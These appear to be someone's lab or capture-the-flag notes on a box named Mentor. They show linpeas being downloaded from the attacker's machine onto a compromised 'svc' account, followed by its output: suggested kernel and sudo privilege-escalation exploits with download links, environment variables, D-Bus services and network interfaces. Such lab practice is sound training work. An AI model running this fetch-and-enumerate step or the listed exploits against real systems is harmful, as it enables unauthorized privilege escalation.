InfoSec LAB

Mentor_Automated

Created: 6 min read

PEAS

svc@mentor:~$ wget -q http://10.10.14.11/linpeas.sh ; chmod 755 ./linpeas.sh

Delivery complete over HTTP

Executing PEAS

CVEs

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: probable
   Tags: [ ubuntu=(22.04) ]{kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-2586] nft_object UAF
 
   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: less probable
   Tags: ubuntu=(20.04){kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2022-0847] DirtyPipe
 
   Details: https://dirtypipe.cm4all.com/
   Exposure: less probable
   Tags: ubuntu=(20.04|21.04),debian=11
   Download URL: https://haxx.in/files/dirtypipez.c
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
 
   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154

Path & Environment Variables

╔══════════╣ Environment
 Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
USER=svc
SSH_CLIENT=10.10.14.11 39592 22
XDG_SESSION_TYPE=tty
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/svc
SSH_TTY=/dev/pts/0
dbus_session_bus_address=unix:path=/run/user/1001/bus
LOGNAME=svc
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=2
path=/home/svc/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=en_US.UTF-8
HISTSIZE=0
ls_colors=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/svc
SSH_CONNECTION=10.10.14.11 39592 10.10.11.193 22
xdg_data_dirs=/usr/local/share:/usr/share:/var/lib/snapd/desktop
HISTFILE=/dev/null

Containers

Services

╔══════════╣ D-Bus Service Objects list
 https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus
NAME                           PID PROCESS         USER             CONNECTION    UNIT                        SESSION DESCRIPTION
:1.0                           765 systemd-resolve systemd-resolve  :1.0          systemd-resolved.service    -       -
:1.1                           766 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -
:1.10                          910 snapd           root             :1.10         snapd.service               -       -
:1.2                           592 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
:1.3                           908 polkitd         root             :1.3          polkit.service              -       -
:1.4                             1 systemd         root             :1.4          init.scope                  -       -
:1.40                         2585 systemd         svc              :1.40         user@1001.service           -       -
:1.5                           912 udisksd         root             :1.5          udisks2.service             -       -
:1.50                         9765 busctl          svc              :1.50         session-2.scope             2       -
:1.6                           923 ModemManager    root             :1.6          ModemManager.service        -       -
:1.7                           911 systemd-logind  root             :1.7          systemd-logind.service      -       -
:1.9                           906 networkd-dispat root             :1.9          networkd-dispatcher.service -       -
com.ubuntu.SoftwareProperties    - -               -                (activatable) -                           -       -
org.freedesktop.DBus             1 systemd         root             -             init.scope                  -       -
org.freedesktop.modemmanager1  923 modemmanager    root             :1.6          ModemManager.service        -       -
org.freedesktop.PackageKit       - -               -                (activatable) -                           -       -
org.freedesktop.policykit1     908 polkitd         root             :1.3          polkit.service              -       -
org.freedesktop.udisks2        912 udisksd         root             :1.5          udisks2.service             -       -
org.freedesktop.UPower           - -               -                (activatable) -                           -       -
org.freedesktop.bolt             - -               -                (activatable) -                           -       -
org.freedesktop.fwupd            - -               -                (activatable) -                           -       -
org.freedesktop.hostname1        - -               -                (activatable) -                           -       -
org.freedesktop.locale1          - -               -                (activatable) -                           -       -
org.freedesktop.login1         911 systemd-logind  root             :1.7          systemd-logind.service      -       -
org.freedesktop.network1       592 systemd-network systemd-network  :1.2          systemd-networkd.service    -       -
org.freedesktop.resolve1       765 systemd-resolve systemd-resolve  :1.0          systemd-resolved.service    -       -
org.freedesktop.systemd1         1 systemd         root             :1.4          init.scope                  -       -
org.freedesktop.thermald         - -               -                (activatable) -                           -       -
org.freedesktop.timedate1        - -               -                (activatable) -                           -       -
org.freedesktop.timesync1      766 systemd-timesyn systemd-timesync :1.1          systemd-timesyncd.service   -       -

Hosts

Networks

╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
br-028c7a43f929: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.20.0.1  netmask 255.255.0.0  broadcast 172.20.255.255
        ether 02:42:05:24:4c:de  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-24ddaa1f3b47: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.19.0.1  netmask 255.255.0.0  broadcast 172.19.255.255
        ether 02:42:91:6d:19:94  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-3d63c18e314d: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.21.0.1  netmask 255.255.0.0  broadcast 172.21.255.255
        ether 02:42:50:81:fe:3b  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-7d5c72654da7: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.22.0.1  netmask 255.255.0.0  broadcast 172.22.255.255
        inet6 fe80::42:1cff:fefa:2974  prefixlen 64  scopeid 0x20<link>
        ether 02:42:1c:fa:29:74  txqueuelen 0  (Ethernet)
        RX packets 99024  bytes 8189199 (8.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 91802  bytes 16644600 (16.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
br-a8a89c3bf6ff: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.18.0.1  netmask 255.255.0.0  broadcast 172.18.255.255
        ether 02:42:39:6b:f2:5a  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:11:63:61:ef  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.193  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:d25d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:d2:5d  txqueuelen 1000  (Ethernet)
        RX packets 84838  bytes 20297801 (20.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 88538  bytes 9041440 (9.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 2830  bytes 201342 (201.3 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2830  bytes 201342 (201.3 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth1fbf3a9: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::e007:5dff:fe58:a035  prefixlen 64  scopeid 0x20<link>
        ether e2:07:5d:58:a0:35  txqueuelen 0  (Ethernet)
        RX packets 109  bytes 17889 (17.8 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 174  bytes 15773 (15.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
veth79ba3f3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::c73:30ff:fe0d:6d10  prefixlen 64  scopeid 0x20<link>
        ether 0e:73:30:0d:6d:10  txqueuelen 0  (Ethernet)
        RX packets 6  bytes 308 (308.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 29  bytes 1995 (1.9 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
vethda9f088: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet6 fe80::81f:24ff:fe8c:3447  prefixlen 64  scopeid 0x20<link>
        ether 0a:1f:24:8c:34:47  txqueuelen 0  (Ethernet)
        RX packets 98909  bytes 9557338 (9.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 91663  bytes 16631594 (16.6 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

NICs

GPG

Installed Programs

Compilers

MySQL

Nginx

Apache

SSH

SNMP

.sh files

Interesting Files

/opt

Interactive Graph View

Backlinks